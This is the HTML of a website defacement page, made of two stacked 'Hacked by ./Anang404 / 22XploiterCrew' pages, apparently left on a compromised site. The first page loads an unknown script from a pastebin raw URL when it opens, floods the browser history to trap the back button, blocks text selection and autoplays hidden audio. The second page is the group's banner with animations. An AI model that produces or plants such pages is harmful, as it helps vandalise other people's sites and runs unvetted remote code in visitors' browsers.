<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"> 
<title>Hacked by 22XploiterCrew</title> <meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests"> <meta name="google-site-verification" content="robh"> <meta name="theme-color" content="black">  <meta name="description" content="22XploiterCrew"> <meta name="author" content="./Anang404"> <meta name="keywords" content="./Anang404, 22XC"> <meta name="googlebot" content="all"> <meta name="robots" content="all"> <meta name="googlebot-news" content="all"> <meta name="google" content="notranslate"> <meta name="og:title" content="Hacked by Anang404"> <meta property="og:site_name" content="https://google.co.id"> <meta property="og:image" content="http://www.nasa.gov/sites/default/files/images/nasaLogo-570x450.png"> <meta property="og:type" content="website"> <meta property="og:updated_time" content="1440432930">   <script type="text/javascript" src="https://pastebin.com/raw/ynL2hpMe"> </script> <style type="text/css"> @import url("//fonts.googleapis.com/css?family=Iceland|Shadows+Into+Light&display=swap"); body{    overflow:hidden;    display: flex;    align-items: center;    justify-content: center;    margin:0;    padding:0;    width:100%;    background-color:#000;    } i{ margin:10px; } a:link{ color:#000; } h1{   color: #000;   text-decoration: none;   border-radius:0px;   border:0px;   font-family: 'Shadows Into Light', cursive;   font-size:50px;   margin:0px;   padding:0px;   animation:lamerkaratan 0.5s linear infinite; } #pojok{ position:absolute; bottom:0px; right:0px; } pre{ color:white; } marquee{ width:100%; } @keyframes lamerkaratan{ 2%{color:#fff;} 3%{transform:translate(2px,-10px) skewX(3240deg);} 5%{transform:translate(0px,0px) skewX(0deg);} 2% , 54%{transform:translateX(0px) skew(0deg);} 55%{transform:translate(-2px,6px) skew(-5530deg);} 56%{transform:translate(0px,0px) skew(0deg);} 57%{transform:translate(4px,-10px) skew(-70deg);} 58%{transform:translate(0px,0px) skew(0deg);} 62%{transform:translate(0px,20px) skew(0deg);} 63%{transform:translate(4px,-2px) skew(0deg);} 90%{transform:translate(1px,3px); skew(-230deg);} 95%{transform:translate(-7px,2px); skew(-120deg);} 100%{transform:translate(0px,0px) skew(0deg);} </style></head>  <body scroll="no" style="overflow: hidden" ondragstart="window.event.returnValue=false" onselectstart="event.returnValue=false"> <embed src="https://4.top4top.net/m_1436gxavt1.mp3" type="audio/mpeg" autostart="true" loop="true" height="0" width="0"> <script> (function () { for(var i = 0; i < 20; i++) { history.pushState(null, document.title, window.location.href ); } })(document, window, history); </script> <center><h1><font color="
red">Hacked by</font> ./Anang404</h1><br><br> <font color="white"> Shotz : <br><br><font color="white"><b>{ </b>Jika Anda yakin bahwa satu ide dapat mengubah dunia, maka kami percaya Anda adalah gagasan itu <b> }</b><br> <br><font color="red"><font color="red">22XploiterCrew <font color="white">OFFICIAL<br><font color="red">Indonesia Ha<font color="white">cker Rulez </font></font></font></font></font></font></font></center><font color="white"><font color="00ff00"><font color="green"><font color="red"><font color="white"><font color="red"><font color="white"> </font></font></font></font></font></font></font></body></html>
<!-- 
31July Here :')
-->
<html lang="en">
  <head>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=0.75, shrink-to-fit=no">
    <meta name="theme-color" content="#000">
    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/css/bootstrap.min.css" integrity="sha384-MCw98/SFnGE8fJT3GXwEOngsV7Zt27NXFoaoApmYm81iuXoPkFOJwJ8ERdknLPMO" crossorigin="anonymous">
    <link href="https://fonts.googleapis.com/css?family=Almendra+Display|Almendra+SC|Piedra&display=swap" rel="stylesheet">
    	<script type="text/javascript" src="js/bootstrap.min.js"></script>
			<script type="text/javascript" src="js/jquery.js"></script>
			<script type="text/javascript" src="js/jquery-1.10.2.min.js.download"></script>
			<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.1/jquery.min.js"></script>
			<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>

    <title>Hacked By ./Anang404</title>
    <style>
    	body {
    		background-color:black;
    		padding:0;
    		margin:0;
    	}
    	.tmp {
    		padding-top: 25%;
    	}
    	.satu {
    		font-family: "Almendra SC";
    		color:white;
    		animation: blikk 6s linear infinite;
    	}
    	small {
    		font-family: "Almendra SC";
    		color:white;
    	}
    	h1 {
    		font-family: "Almendra Display";
    		color:white;
    	}
    	.ico {
    		width:250px;
    		height:250px;
    		margin:0;
    		padding:0;
    	}
    	#particles-js {
    		width: 100%;
    		height: 100%; 
    		background-size: cover; 
    		background-position: 50% 50%; 
    		position: fixed; 
    		top: 0px; 
    		z-index:1;
    	} 
    	@keyframes blikk{
    		0% {
    			color: darkred;
    			text-shadow: #fff 0px 0px 10px;
    		}
    		50% {
    			color: white;
    			text-shadow: darkred 0px 0px 10px;
    		}
    		100% {
    			color: darkred;
    			text-shadow: #fff 0px 0px 10px;
    		}
    	}
    </style>
  </head>
  <body id="">

    <div class="tmp" id="">
    	<div class="container">
    	<h1 class="text-center">Hacked By ./<font color="Red">A</font>nang<font color="Red">4</font>04</h1>
    	 class="ico mx-auto d-block">
    	<p class="satu text-center">
    		<font color="Red">[ </font>
    		We Brothers Thrive Together
    		<font color="Red"> ]</font>
    		<br>
    		<font color="white">-= |</font>
    		 22XploiterCrew 
    		<font color="white">| =-</font> <br>  		
    	</p>
    	<center>
    		 <small>
    		Security Is Illusion  <br><br> <font color="white">copyright©22XploiterCrew</font>
    	</small>
    	</center>
    </div>
   </div>
 <div id="particles-js">
 	<canvas class="particles-js-canvas-el" style="width: 100%; height: 100%;" width="1365" height="949"></canvas>
</div>
  </div>
  
  <script type="text/javascript">
    	$.getScript("https://cdnjs.cloudflare.com/ajax/libs/particles.js/2.0.0/particles.min.js", function(){ 
    	particlesJS('particles-js', {
    		"particles": {
    				"number": {
    						"value": 80, 
    						"density": {
    						"enable": true, 
    						"value_area": 800 
    					} }, "color": {
    						"value": "#fff" }, 
    						"shape": { "type": "circle", 
    						"stroke": { "width": 0, "color": "#000000" }, 
    						"polygon": { "nb_sides": 5 }, 
    						"image": { "width": 100, "height": 100 } }, 
    						"opacity": { "value": 0.5, "random": false, 
    						"anim": { 
    								"enable": false, 
    								"speed": 1, 
    								"opacity_min": 0.1, 
    								"sync": false } }, 
    						"size": { 
    								"value": 5, 
    								"random": true, 
    						"anim": { 
    								"enable": false, 
    								"speed": 40, 
    								"size_min": 0.1, 
    								"sync": false } }, 
    						"line_linked": { 
    								"enable": true, 
    								"distance": 150, 
    								"color": "#FF0000", 
    								"opacity": 0.4, 
    								"width": 1 }, 
    						"move": { 
    								"enable": true, 
    								"speed": 2, 
    								"direction": "none", 
    								"random": false, 
    								"straight": false, 
    								"out_mode": "out", 
    						"attract": { "enable": false, "rotateX": 600, "rotateY": 1200 } } }, 
    						"interactivity": { 
    						"detect_on": "canvas", 
    						"events": { 
    						"onhover": { 
    						"enable": true, "mode": "repulse" }, 
    						"onclick": { 
    								"enable": true, 
    								"mode": "push" }, 
    						"resize": true }, 
    						"modes": { 
    						"grab": { "distance": 400, "line_linked": { 
    						"opacity": 1 } }, 
    						"bubble": { "distance": 400, "size": 50, "duration": 2, "opacity": 8, "speed": 1 }, 
    						"repulse": { "distance": 200 }, 
    						"push": { "particles_nb": 4 }, "remove": { 
    						"particles_nb": 2 } } }, 
    						"retina_detect": true, "config_demo": { 
    						"hide_card": false, 
    						"background_color": "#b61924", 
    						"background_image": "", 
    						"background_position": "50% 50%", 
    						"background_repeat": 
    						"no-repeat", 
    						"background_size": "cover" 
    						} 
    					});
    				}); 
    		</script>
   <iframe width="0" height="0" scrolling="no" frameborder="no" allow="autoplay" src="https://api.soundcloud.com/tracks/208513276/stream?client_id=a3e059563d7fd3372b49b37f00a00bcf" ></iframe> 
  </body>
</html>
